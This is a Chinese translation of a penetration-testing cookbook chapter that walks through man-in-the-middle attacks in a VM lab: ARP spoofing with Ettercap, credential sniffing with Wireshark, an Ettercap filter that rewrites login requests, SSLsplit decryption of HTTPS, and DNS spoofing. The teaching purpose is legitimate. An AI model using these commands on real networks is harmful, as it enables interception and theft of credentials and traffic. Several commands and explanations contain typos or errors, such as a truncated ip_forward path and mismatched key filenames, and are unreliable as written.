作者：Gilberto Najera-Gutierrez
譯者：飛龍
協(xié)議：CC BY-NC-SA 4.0

簡介

中間人（MITM）攻擊是一種攻擊類型，其中攻擊者將它自己放到兩方之間，通常是客戶端和服務端通信線路的中間。這可以通過破壞原始頻道之后攔截一方的消息并將它們轉(zhuǎn)發(fā)（有時會有改變）給另一方來實現(xiàn)。

讓我們觀察下面這個例子：

Alice 連接到了 Web 服務器上，Bob打算了解 Alice 正在發(fā)送什么信息。于是 Bob 建立 MITM 攻擊，通過告訴服務器他是 Alice，并且告訴 Alice 他是服務器?，F(xiàn)在，所有 Alice 的請求都會發(fā)給 Bob，Bob 會將它們轉(zhuǎn)發(fā)給服務器，并對服務器的響應做相同操作。這樣，Bob 就能夠攔截、讀取或修改所有 Alice 和服務器之間的流量。

雖然 MITM 攻擊并不特定與 Web 攻擊，了解如何執(zhí)行它們，以及如何防止它們，對于任何滲透測試者都非常重要，因為它們可以用于偷取密碼，劫持會話，或者執(zhí)行 Web 應用中的非授權操作。

這一章中，我們會建立起中間人攻擊，并使用它來獲得信息，以及執(zhí)行更加復雜的攻擊。

8.1 使用 Ettercap 執(zhí)行欺騙攻擊

地址解析協(xié)議（ARP）欺騙可能是最常見的 MITM 攻擊。它基于一個事實，就是 ARP 并不驗證系統(tǒng)所收到的響應。這就意味著，當 Alice 的電腦詢問網(wǎng)絡上的所有設備，“IP 為 xxx.xxx.xxx.xxx 的機器的 MAC 地址是什么”時，它會信任從任何設備得到的答復。該設備可能是預期的服務器，也可能是不是。ARP 欺騙或毒化的工作方式是，發(fā)送大量 ARP 響應給通信的兩端，告訴每一端攻擊者的 MAC 地址對應它們另一端的 IP 地址。

這個秘籍中，我們會使用Ettercap 來執(zhí)行 ARP 欺騙攻擊，并將我們放到客戶端和服務器之間。

準備

對于這個秘籍，我們會使用第一章配置的客戶端虛擬機，和vulnerable_vm?？蛻舳说?IP 是 192.168.56.101，vulnerable_vm 是 192.168.56.102。

操作步驟

• 1.將兩個虛擬機打開，我們的 Kali Linux（192.168.56.1）主機是攻擊者的機器。打開終端窗口并輸入下列命令：

1  ettercap –G

從 Ettercap 的主菜單中，選擇Sniff | Unified Sniffing。

• 2.在彈出的對話框中選擇你打算使用的網(wǎng)絡接口，這里我們選擇vboxnet0，像這樣：
  

• 3.既然我們嗅探了網(wǎng)絡，下一步就是識別哪個主機正在通信。訪問主菜單的Hosts之后選擇Scan for hosts。

• 4.從我們發(fā)現(xiàn)的主機中，選擇我們的目標。從Hosts菜單欄中選擇Hosts list。
  

• 5.從列表中選擇192.168.56.101，并點擊Add to Target 1。

• 6.之后選擇192.168.56.102，之后點擊Add to Target 2。

• 7.現(xiàn)在我們檢查目標：在Targets菜單中，選擇Current targets。
  

• 8.我們現(xiàn)在準備好了開始欺騙攻擊，我們的位置在服務器和客戶端中間，在Mitm菜單中，選擇ARP poisoning。

• 9.在彈出的窗口中，選中Sniff remote connections，然后點擊OK。
  

這就結(jié)束了，我們現(xiàn)在可以看到在客戶端和服務端之間的流量。

工作原理

在我們鍵入的第一個命令中，我們告訴 Ettercap 啟動 GTK 界面。

其它界面選項為-T啟動文本界面，-C啟動光標（以 ASCII 文本），-D運行為守護進程，沒有界面。

之后，我們啟動了 Ettercap 的嗅探功能。統(tǒng)一模式意味著我們會通過單一網(wǎng)絡接口接受并發(fā)送信息。當我們的目標通過不同網(wǎng)絡接口到達時，我們選擇橋接模式。例如，如果我們擁有兩個網(wǎng)卡，并且通過其一連接到客戶端，另一個連接到服務端。

在嗅探開始之后，我們選擇了目標。

事先選擇你的目標

單次攻擊中，選擇唯一必要主機作為目標非常重要，因為毒化攻擊會生成大量網(wǎng)絡流量，并導致所有主機的性能問題。在開始 MITM 攻擊之前，弄清楚那兩個系統(tǒng)會成為目標，并僅僅欺騙這兩個系統(tǒng)。

一旦設置了目標，我們就可以開始 ARP 毒化攻擊。Sniffing remote connections意味著 Ettercap 會捕獲和讀取所有兩端之間的封包，Only poison one way在我們僅僅打算毒化客戶端，而并不打算了解來自服務器或網(wǎng)關的請求時（或者它擁有任何對 ARP 毒化的保護時）非常實用。

8.2 使用 Wireshark 執(zhí)行 MITM 以及捕獲流量

Ettercap 可以檢測到經(jīng)過它傳播的相關信息，例如密碼。但是，在滲透測試的時候，它通常不足以攔截一些整數(shù)，我們可能要尋找其他信息，類似信用卡的號碼，社會安全號碼，名稱，圖片或者文檔。擁有一個可以監(jiān)聽網(wǎng)絡上所有流量的工具十分實用，以便我們保存和之后分析它們。這個工具是個嗅探器，最符合我們的目的的工具就是 Wireshark，它包含于 Kali Linux。

這個秘籍中，我們會使用 Wireshark 來捕獲所有在客戶端和服務端之間發(fā)送的封包來獲取信息。

準備

在開始之前我們需要讓 MITM 工作。

操作步驟

• 1.從 Kali Applications菜單的Sniffing & Spoofing啟動 Wireshark，或者從終端中執(zhí)行：

1  wireshark

• 2.當 Wireshark 加載之后，選項你打算用于捕獲封包的網(wǎng)卡。我們這里選擇vboxnet0，像這樣：
  

• 3.之后點擊Start。你會立即看到 Wireshark 正在捕獲 ARP 封包，這就是我們的攻擊。
  

• 4.現(xiàn)在，來到客戶端虛擬機，瀏覽http://192.168.56.102/ dvwa
  ，并登陸 DVWA。

• 5.在 Wireshark 中的info區(qū)域中，查找來自192.168.56.101到192.168.56.102，帶有 POST /dvwa/login.php的 HTTP 封包。
  

  
  如果我們?yōu)g覽所有捕獲的封包，我們會看到一個封包對應授權，并會看到我們可以以純文本獲得用戶名和密碼。

使用過濾器

我們可以在 Wireshark 中使用過濾器來只展示我們感興趣的封包。例如，為了只查看 登錄頁面的 HTTP 請求，我們可以使用：http. request.uri contains "login"。

如果我們查看 Ettercap 的窗口，我們也能看到用戶名和密碼，像這樣：

通過捕獲客戶端和服務端之間的流量，攻擊者能夠提取和利用所有類型的敏感信息，例如用戶名、密碼、會話 Cookie、賬戶號碼、信用卡號碼、私人郵件，以及其它。

工作原理

Wireshark 監(jiān)聽每個我們選擇監(jiān)聽的接口上的封包，并在它的界面中顯示。我們可以選擇監(jiān)聽多個接口。

當我們首先啟動嗅探的時候，我們了解了 ARP 欺騙如何工作。它發(fā)送大量 ARP 封包給客戶端和服務端，以便防止它們的地址解析表（ARP 表）從正當?shù)闹鳈C獲得正確的值。

最后，當我們向服務器發(fā)送請求時，我們看到了 Wireshark 如何捕獲所有包含在請求中的信息，包含協(xié)議、來源和目的地 IP。更重要的是，它包含了由客戶端發(fā)送的數(shù)據(jù)，其中包含管理員密碼。

另見

研究 Wireshark 數(shù)據(jù)有一些無聊，所以了解如何在捕獲封包時使用顯示過濾器非常重要。你可以訪問下列站點來了解更多信息。

• https://www.wireshark.org/docs/wsug_html_chunked/ChWorkDisplayFilterSection.html
• https://wiki.wireshark.org/DisplayFilters

使用 Wireshark，你可以通過捕獲過濾器來選擇捕獲哪種數(shù)據(jù)。這是非常實用的特性，尤其是執(zhí)行 MITM攻擊時生成大量流量的時候。你可以從下列站點中閱讀更多信息。

• https://www.wireshark.org/docs/wsug_html_chunked/ChCapCaptureFilterSection.html
• https://wiki.wireshark.org/CaptureFilters

8.3 修改服務端和客戶端之間的數(shù)據(jù)

在執(zhí)行 MITM 攻擊時，我們不僅僅能夠監(jiān)聽在受害者系統(tǒng)之間發(fā)送的任何數(shù)據(jù)，也能夠修改請求和響應，因而按照我們的意圖調(diào)整它們的行為。

這個秘籍中，我們會使用 Ettercap 過濾器來檢測封包是否包含我們感興趣的信息，并觸發(fā)改變后的操作。

準備

在開始之前我們需要讓 MITM 工作。

操作步驟

• 1.我們的第一步是創(chuàng)建過濾器文件。將下列代碼保存到文本文件中（我們命名為regex-replace-filter.filter）:

1
2  # If the packet goes to vulnerable_vm on TCP port 80 (HTTP) 
3  
4  if (ip.dst == '192.168.56.102'&& tcp.dst == 80) { 
5    # if the packet's data contains a login page  
6    if (search(DATA.data, "POST")){ 
7      msg("POST request"); 
8      if (search(DATA.data, "login.php") ){ 
9        msg("Call to login page"); 
10       # Will change content's length to prevent server from failing 
11       pcre_regex(DATA.data, "Content-Length:\ [0-9]*","Content-Length: 41"); 
12       msg("Content Length modified"); 
13       # will replace any username by "admin" using a regular expression 
14       if (pcre_regex(DATA.data, "username=[a-zAZ]*&","username=admin&")) { 
15         msg("DATA modified\n"); 
16       }  
17     msg("Filter Ran.\n"); 
18   } 
19  } 
20 }

#符號使注釋。這個語法非常類似于 C，除了注釋和一些不同。

• 2.下面我們需要為 Ettercap 編譯過濾器來使用它。從終端中，執(zhí)行下列命令。

1  etterfilter -o regex-replace-filter.ef regex-replace-filter.filter

• 3.現(xiàn)在，從 Ettercap 的菜單中，選擇Filters | Load a filter，后面是regexreplace-filter.ef，并點擊Open。
  我們會看到 Ettercap 的日志窗口中出現(xiàn)新的條目，表明新的過濾器已經(jīng)加載了。
  

• 4.在客戶端中，瀏覽http://192.168.56.102/dvwa/并使用密碼admin登陸任意用戶，例如：inexistentuser: admin。
  

  
  用戶現(xiàn)在登陸為管理員，并且攻擊者擁有了對兩個用戶都生效的密碼。

• 5.如果我們檢查 Ettercap 的日志，我們可以看到我們編寫在代碼中的消息會出現(xiàn)在這里，像這樣：

  
  

工作原理

ARP 欺騙攻擊是更加復雜的攻擊的開始。這個秘籍中，我們使用了 Ettercap 的封包過濾功能來識別帶有特定內(nèi)容的封包，并修改它來強制讓用戶以管理員登錄應用。這也可以從服務端到客戶端來完成，可以用來通過展示一些偽造信息來欺騙用戶。

我們的第一步是創(chuàng)建過濾腳本，它首先檢查被分析的封包是否含有我們打算改變的信息，像這樣：

1  if (ip.dst == '192.168.56.102'&& tcp.dst == 80) {

如果目標 IP 是 vulnerable_vm之一，且 TCP 端口是 80（默認 HTTP 端口號），它就是發(fā)往我們打算攔截的服務器的請求。

1  if (search(DATA.data, "POST")){ 
2    msg("POST request"); 
3    if (search(DATA.data, "login.php") )}

如果請求使用 POST 方法，且去往login.php頁面，它就是登錄嘗試，因為這是我們的目標應用接收登錄嘗試的方式。

1  pcre_regex(DATA.data, "Content-Length\:\ [0-9]*","Content-Length: 41");

我們使用正則表達式來獲取請求中的Content-Length參數(shù)，并將它的值改為 41，這是我們發(fā)送帶有admin/admin憑證的登錄封包的長度。

1  if (pcre_regex(DATA.data, "username=[a-zA-Z]*&","username=admin&")){ 
2    msg("DATA modified\n"); 
3  }

同樣，使用正則表達式，我們在請求中查找用戶名稱值，并將它替換為admin。

消息（msg）僅僅用于跟蹤和調(diào)試目的，可以被從腳本中忽略。

在編寫完腳本之后，我們使用 Ettercap 的 etterfilter 編譯他，以便執(zhí)行它。之后，我們在 Ettercap 中加載它，然后等待客戶端連接。

8.4 發(fā)起 SSL MITM 攻擊

如果我們使用我們目前的方法嗅探 HTTPS 會話，我們不能從中得到很多信息，因為所有通信都是加密的。

為了攔截、讀取和修改 SSL 和 TLS 的連接，我們需要做一系列準備步驟，來建立我們的 SSL 代理。SSLsplit 的仿作方式是使用兩個證書，一個用于告訴服務器這是客戶端，以便它可以接收和解密服務器的響應，另一個告訴客戶端這是服務器。對于第二個證書，如果我們打算代替一個擁有自己的域名的網(wǎng)站，并且它的證書由認證中心（CA）簽發(fā)，我們就需要讓 CA 為我們簽發(fā)根證書，但因為我們是攻擊者，我們就需要自己來做。

這個秘籍中，我們會配置我們自己的 CA，以及一些 IP 轉(zhuǎn)發(fā)規(guī)則來執(zhí)行 SSL 中間人攻擊。

操作步驟

• 1.首先，我們打算在 Kali 上創(chuàng)建 CA 私鑰，所以在 root 終端中鍵入下列命令：

1  openssl genrsa -out certaauth.key 4096 

• 2.現(xiàn)在讓我們創(chuàng)建一個使用這個密鑰簽名的證書：

1  openssl req -new -x509 -days 365 -key certauth.key -out ca.crt

• 3.填充所需信息（或者僅僅對每個字段按下回車）。

• 4.下面，我們需要開啟 IP 轉(zhuǎn)發(fā)來開啟系統(tǒng)的路由功能（將目標不是本地主機的 IP 包轉(zhuǎn)發(fā)到網(wǎng)關）：

1  echo 1 > /proc/sys/net/ipv4/ip_forwar

• 5.現(xiàn)在我們打算配置一些會澤來防止轉(zhuǎn)發(fā)任何東西。首先，讓我們檢查我們的 iptables 的nat表中是否有任何東西：

1  iptables -t nat -L

• 6.如果有東西，你可能打算備份一下，因為我們會刷新它們，如下：

1  iptables -t nat -L > iptables.nat.bkp.txt 

• 7.現(xiàn)在讓我們刷新整個表。

1  iptables -t nat -F

• 8.之后我們建立 PREROUTING 規(guī)則：

1  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --toports 8080 
2  iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --toports 8443 

現(xiàn)在我們已經(jīng)準備好嗅探加密連接。

工作原理

這個秘籍中，我們配置了 Kali 主機來充當 CA，這意味著它可以校驗 SSLsplit 使用的證書。在前兩步中，我們僅僅創(chuàng)建了私鑰，和使用私鑰簽名的證書。

下面，我們建立了端口轉(zhuǎn)發(fā)規(guī)則。我們首先開啟了轉(zhuǎn)發(fā)選項，之后創(chuàng)建了 iptables 規(guī)則來將 80 端口的請求轉(zhuǎn)發(fā)到 443（HTTP 到 HTTPS）。這是為了重定向請求。我們的 MITM 攻擊會攔截 SSLsplit，便于它使用一個證書來解密收到的消息、處理它，使用另一個證書加密并發(fā)送到目的地。

另見

你應該了解更多加密證書以及 SSL 和 TLS 協(xié)議，還有 SSLsplit，可以訪問這里：

• https://en.wikipedia.org/wiki/Public_key_certificate
• https://www.roe.ch/SSLsplit
• https://en.wikipedia.org/wiki/Iptables
• man iptables

8.5 使用 SSLsplit 獲得 SSL 數(shù)據(jù)

在之前的密集中，我們準備了環(huán)境來攻擊 SSL/TLS 連接。而這個秘籍中，我們會使用 SSLsplit 來完成 MITM 攻擊并從加密連接中提取信息。

準備

我們需要在開始秘籍之前執(zhí)行 ARP 欺騙攻擊，并成功完成了上一個秘籍。

操作步驟

• 1.首先，我們需要創(chuàng)建目錄，其中 SSLsplit 在里面存放日志。打開終端并創(chuàng)建兩個目錄，像這樣：

1  mkdir /tmp/sslsplit 
2  mkdir /tmp/sslsplit/logdir

• 2.現(xiàn)在，讓我們啟動 SSLSplit：

1  sslsplit -D -l connections.log -j /tmp/sslsplit -S logdir -k certauth.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

• 3.現(xiàn)在，SSLSplit 正在運行，Windows 客戶端和 vulnerable_vm 之間存在 MITM，來到客戶端并訪問https://192.168.56.102/dvwa/。

• 4.瀏覽器會要求確認，因為我們的 CA 和證書并不是被任何瀏覽器官方承認的。設置例外并繼續(xù)。

  
  

• 5.現(xiàn)在登錄 DVWA ，使用管理員用戶和密碼。

• 6.讓我們看看 SSLSplit 中發(fā)生了什么。打開新的終端并檢查日志內(nèi)容，在我們?yōu)?SSLSplit 創(chuàng)建的目錄中：

1  ls /tmp/sslsplit/logdir/ 
2  cat /tmp/sslsplit/logdir/*

現(xiàn)在，即使 Ettercap 和 Wireshark 只能看到加密數(shù)據(jù)，我么也可以以純文本在 SSLSplit 中查看通信。

工作原理

這個秘籍中，我們繼續(xù) SSL 連接上的攻擊。在第一步中，我們創(chuàng)建了目錄，其中 SSLSplit 會將捕獲到的信息存在里面。

第二步就是使用下列命令執(zhí)行 SSLSplit：

• -D：這是在前臺運行 SSLSplit，并不是守護進程，并帶有詳細的輸出。

• -l connections.log：這將每個連接的記錄保存到當前目錄的connections.log中。

• -j /tmp/sslsplit：這用于建立jail directory目錄，/tmp/sslsplit會作為 root（chroot）包含 SSLSplit 的環(huán)境。

• -S logdir：這用于告訴 SSLSplit 將內(nèi)容日志（所有請求和響應）保存到logdir（在jail目錄中），并將數(shù)據(jù)保存到單獨的文件中。

• -k和-c：這用于指明和充當 CA 時，SSLSplit 所使用的私鑰和證書。

• ssl 0.0.0.0 8443：這告訴 SSLSplit 在哪里監(jiān)聽 HTTPS（或者其它加密協(xié)議）連接。要記住這是我們在上一章中使用 iptables 從 443 轉(zhuǎn)發(fā)的接口。

• tcp 0.0.0.0 8080：這告訴 SSLSplit 在哪里監(jiān)聽 HTTP 連接。要記住這是我們在上一章中使用 iptables 從 80 轉(zhuǎn)發(fā)的接口。

在執(zhí)行這些命令之后，我們等待客戶端瀏覽器服務器的 HTTPS 頁面并提交數(shù)據(jù)，之后我們檢查日志文件來發(fā)現(xiàn)未加密的信息。

8.6 執(zhí)行 DNS 欺騙并重定向流量

DNS 欺騙是一種攻擊，其中執(zhí)行 MITM 攻擊的攻擊者使用它來修改響應受害者的 DNS 服務器中的名稱解析，發(fā)送給他們惡意頁面，而不是他們請求的頁面，但仍然使用有效名稱。

這個秘籍中，我們會使用 Ettercap 來執(zhí)行 DNS 欺騙攻擊，并在受害者打算瀏覽別的網(wǎng)站時，使其瀏覽我們的網(wǎng)站。

準備

對于這個秘籍，我們需要使用我們的 WIndows 客戶端虛擬機，但是這次網(wǎng)絡識別器橋接到 DNS 解析中。這個秘籍中它的 IP 地址為 192.168.71.14。

攻擊者的機器是我們的 Kali 主機，IP 為 192.168.71.8。它也需要運行 Apache 服務器，并擁有index.html演示頁面，我們會包含下列東西：

1  <h1>Spoofed SITE</h1>

操作步驟

• 1.假設我們已經(jīng)啟動了 Apache 服務器，并正確配置了偽造頁面，讓我們編輯/etc/ettercap/etter.dns，使它僅僅包含下面這一行：

1  * A 192.168.71.8

我們僅僅設置一條規(guī)則：所有 A 記錄（地址記錄）都解析到192.168.71.8，這是我們 Kali 的地址。我們可以設置其他條目，但是我們打算在這里避免干擾。

• 2.這次，我們從命令行運行 Ettercap。打開 root 終端并鍵入下列命令：

1  ettercap -i wlan0 -T -P dns_spoof -M arp /192.168.71.14///

它會以文本模式運行 Ettercap，并開啟 DNS 欺騙插件來執(zhí)行 ARP 欺騙攻擊，目標僅僅設置為192.168.71.14。

• 3.啟動攻擊之后，我們來到客戶端主機，并嘗試通過網(wǎng)站自己的域名來瀏覽網(wǎng)站，例如，www.yahoo.com，像這樣：
  

  
  要注意，現(xiàn)在地址和標簽欄顯示原始站點的名稱，但是內(nèi)容來自不同的地方。

• 4.我們也可以嘗試使用nslookup執(zhí)行地址解析，像這樣：
  

工作原理

這個秘籍中，我們看到如何使用中間人攻擊來強制用戶瀏覽某個頁面，他們甚至相信自己在其它站點上。

在第一步中，我們修改了 Ettercap 的名稱解析文件，讓它將所有請求的名稱重定向到我們的 Kali 主機。

之后，我們以下列參數(shù)運行 Ettercap：-i wlan0 -T -P dns_spoof -M arp /192.168.71.14///。

• -i wlan0：要技術我們需要客戶端進行 DNS 解析，所以我們需要讓它連接到橋接的適配器，并到達我們的 Kali 主機，所以我們將嗅探接口設為wlan0（攻擊者計算機上的無線網(wǎng)卡）。

• -T：使用純文本界面。

• -P dns_spoof：啟動 DNS 欺騙插件。

• -M arp：執(zhí)行 ARP 欺騙攻擊。

• /192.168.71.14///：這是我們在命令行中對 Ettercap 設置目標的方式：MAC/ip_address/port。其中//表示任何對應 IP 192.168.71.14（客戶端）任何端口的 MAC 地址。

最后，我們確認了攻擊能夠正常工作。

另見

也有另一個非常實用的用于這些類型攻擊的工具，叫做 dnsspoof。你應該下載下來并加入工具庫：

1  man dnsspoof

http://www.monkey.org/~dugsong/dsniff/
另一個值得提及的工具是中間人攻擊框架：MITMf。它包含內(nèi)建的 ARP 毒化、DNS 欺騙、WPAD 代理服務器，以及其它攻擊類型的功能。

1  mitmf --help

版權聲明：本文轉(zhuǎn)載自wizardforcel的專欄，如有侵權，請與本人聯(lián)系。
專欄鏈接：http://blog.csdn.net/wizardforcel

原文鏈接：http://blog.csdn.net/wizardforcel/article/details/52798019